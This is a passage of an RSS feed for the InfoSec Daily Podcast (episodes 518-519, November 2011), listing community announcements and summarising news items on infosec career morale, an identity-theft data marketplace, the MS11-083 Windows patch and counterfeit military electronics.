	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://daveshackleford.com/?p=689"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://daveshackleford.com/?p=689</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&rsquo;m perennially happy. I am almost always in a pretty good mood, despite my inherent sarcasm and less-than-politically-correct approach. But I get the impression that many in infosec are not. Everyone is different, and I don&rsquo;t want to stereotype, but I do run into a lot of gloomy folks. Why is the infosec profession so unhappy in general? I closed out the IANS forum in Chicago today (which ROCKED, by the way, just too much awesomeness in CHI to contain), and Ron Ritchie made some comments that I thought were pretty spot-on in his closing thoughts. He mentioned a few good reasons to be in infosec, and I&rsquo;ll list some below, including his:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Reasons infosec rocks:</span></div>
<ul>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Money is good! (Ron)</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We have tons of interesting things to work on! (Ron)</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We bring real value to our organizations! (Ron)</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We can actually detect and prevent crime in some cases!</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We have one hell of a solid career path, in general!</span></li>
</ul>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&rsquo;m sure this all sounds good. High-fives all around! Hmmm. Wait. We&rsquo;ve still got that &ldquo;Sad Panda&rdquo; problem. So there are surely some negative aspects to infosec as well. What are they? Based on my experience as a practitioner, consultant, trainer, and general curmudgeon (albeit a pretty jolly one), a few things I can think of:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Reasons infosec sucks:</span></p>
<ul>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">People ignore us, hate us, or perceive us as roadblocks. Or all three.</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Infosec never seems to be &ldquo;done&rdquo;, ever. Always an ongoing endeavor.</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The landscape in infosec changes so rapidly it&rsquo;s difficult to keep up.</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Overall, infosec is &ldquo;hard&rdquo;.</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Related to the first point in this list, we may feel &ldquo;at odds&rdquo; with business units and IT organizations.</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There&rsquo;s a general sense of &ldquo;futility&rdquo; &ndash; we can&rsquo;t &ldquo;win&rdquo;.</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Our career paths are wack &ndash; do we really have any respect?</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-519-infosec-whiners-rogue-risk-manager-steve-was-right-comcast%e2%80%99s-native-ipv6-and-5-ios-tips/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3117/0/infosec-daily-podcast-episode-519.mp3" length="19236298" type="audio/mpeg" />
		<itunes:duration>0:40:02</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 519 for November 10, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik and Karthik Rangarajan.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad S[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 519 for November 10, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik and Karthik Rangarajan.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	BSides Delaware
	When: November 11-12th, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/28563447/BSidesDelaware
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source:http://daveshackleford.com/?p=689
	I&#8217;m perennially happy. I am almost always in a pretty good mood, despite my inherent sarcasm and less-than-politically-correct approach. But I get the impression that many in infosec are not. Everyone is different, and I don&#8217;t want to stereotype, but I do run into a lot of gloomy folks. Why is the infosec profession so unhappy in general? I closed out the IANS forum in Chicago today (which ROCKED, by the way, just too much awesomeness in CHI to contain), and Ron Ritchie made some comments that I thought were pretty spot-on in his closing thoughts. He mentioned a few good reasons to be in infosec, and I&#8217;ll list some below, including his:
	Reasons infosec rocks:

Money is good! (Ron)
We have tons of interesting things to work on! (Ron)
We bring real value to our organizations! (Ron)
We can actually detect and prevent crime in some cases!
We have one hell of a solid career path, in general!

	I&#8217;m sure this all sounds good. High-fives all around! Hmmm. Wait. We&#8217;ve still got that &#8220;Sad Panda&#8221; problem. So there are surely some negative aspects to infosec as well. What are they? Based on my experience as a practitioner, consultant, trainer, and general curmudgeon (albeit a pretty jolly one), a few things I can think of:
	Reasons infosec sucks:

People ignore us, hate us, or perceive us as roadblocks. Or all three.
Infosec never seems to be &#8220;done&#8221;, ever. Always an ongoing endeavor.
The landscape in infosec changes so rapidly it&#8217;s difficult to keep up.
Overall, infosec is &#8220;hard&#8221;.
Related to the first point in this list, we may feel &#8220;at odds&#8221; with business units and IT organizations.
There&#8217;s a general sense of &#8220;futility&#8221; &#8211; we can&#8217;t &#8220;win&#8221;.
Our career paths are wack &#8211; do we really have any respect?
</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>yes</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 518 &#8211; Badguys Walmart, MS11-083, Fake Circuitry, Random Tracking &amp; Cyber Arms Race</title>
		<link>http://www.isdpodcast.com/episode-518-badguys-walmart-ms11-083-fake-circuitry-random-tracking-cyber-arms-race</link>
		<comments>http://www.isdpodcast.com/episode-518-badguys-walmart-ms11-083-fake-circuitry-random-tracking-cyber-arms-race#comments</comments>
		<pubDate>Thu, 10 Nov 2011 01:49:35 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3113</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 518 for November 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Keith Pachulski, and Varun Sharma. Announcements: Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 518 for November 14, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Keith Pachulski, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://boingboing.net/2011/11/08/identity-theft-marketplace-sells-mothers-maiden-names-dates-of-birth-etc.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">boingboing.net/2011/11/08/identity-theft-marketplace-sells-mothers-maiden-names-dates-of-birth-etc.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many websites will allow you to &quot;recover a lost password&quot; if you (or a crook) can supply your date of birth, mother&#39;s maiden name, etc. So, of course, crooks buy and sell data like dates of birth, mothers&#39; maiden names, Social Security Numbers, and other easily mined minutae. Brian Krebs reports from superget.info, a site that sells would-be fraudsters this information, and also has a wholesale program so that entrepreneurial crooks can resell your personal information to their friends.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Superget lets users search for specific individuals by name, city, and state. Each &ldquo;credit&rdquo; costs USD$1, and a successful hit on a Social Security number or date of birth costs 3 credits each. The more credits you buy, the cheaper the searches are per credit: Six credits cost $4.99; 35 credits cost $20.99, and $100.99 buys you 230 credits. Customers with special needs to can avail themselves of the &ldquo;reseller plan,&rdquo; which promises 1,500 credits for $500.99, and 3,500 credits for $1000.99.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Our Databases are updated EVERY DAY,&rdquo; the site&rsquo;s owner enthuses. &ldquo;About 99% nearly 100% US people could be found, more than any sites on the internet now.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Customers who aren&rsquo;t choosy about the identities they&rsquo;re stealing can get a real bargain. Among the most trafficked commodities in the hacker underground are packages called &ldquo;fullz infos,&rdquo; which include the full identity information on dozens or hundreds of individuals. </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://technet.microsoft.com/en-us/security/bulletin/ms11-083"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://technet.microsoft.com/en-us/security/bulletin/ms11-083</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This security update is rated Critical for all supported editions of Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. For more information, see the subsection, </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Affected and Non-Affected Software</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, in this section.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The security update addresses the vulnerability by modifying the way that the Windows TCP/IP stack keeps track of UDP packets within memory. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vulnerability Information</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Recommendation.</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://hackaday.com/2011/11/08/counterfeit-electronics-in-military-weapons/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://hackaday.com/2011/11/08/counterfeit-electronics-in-military-weapons/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Boeng and the US military found some systems on new P-8 Posiedons to be defective. The culprit: counterfeit electronics. These are scrap parts from 80s-90s electronics that have been re-branded and sold to the government as new. &nbsp;Many of the parts have been linked to dealers in China, but the Chinese government feels no need to pursue this(according to the article).</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:tra
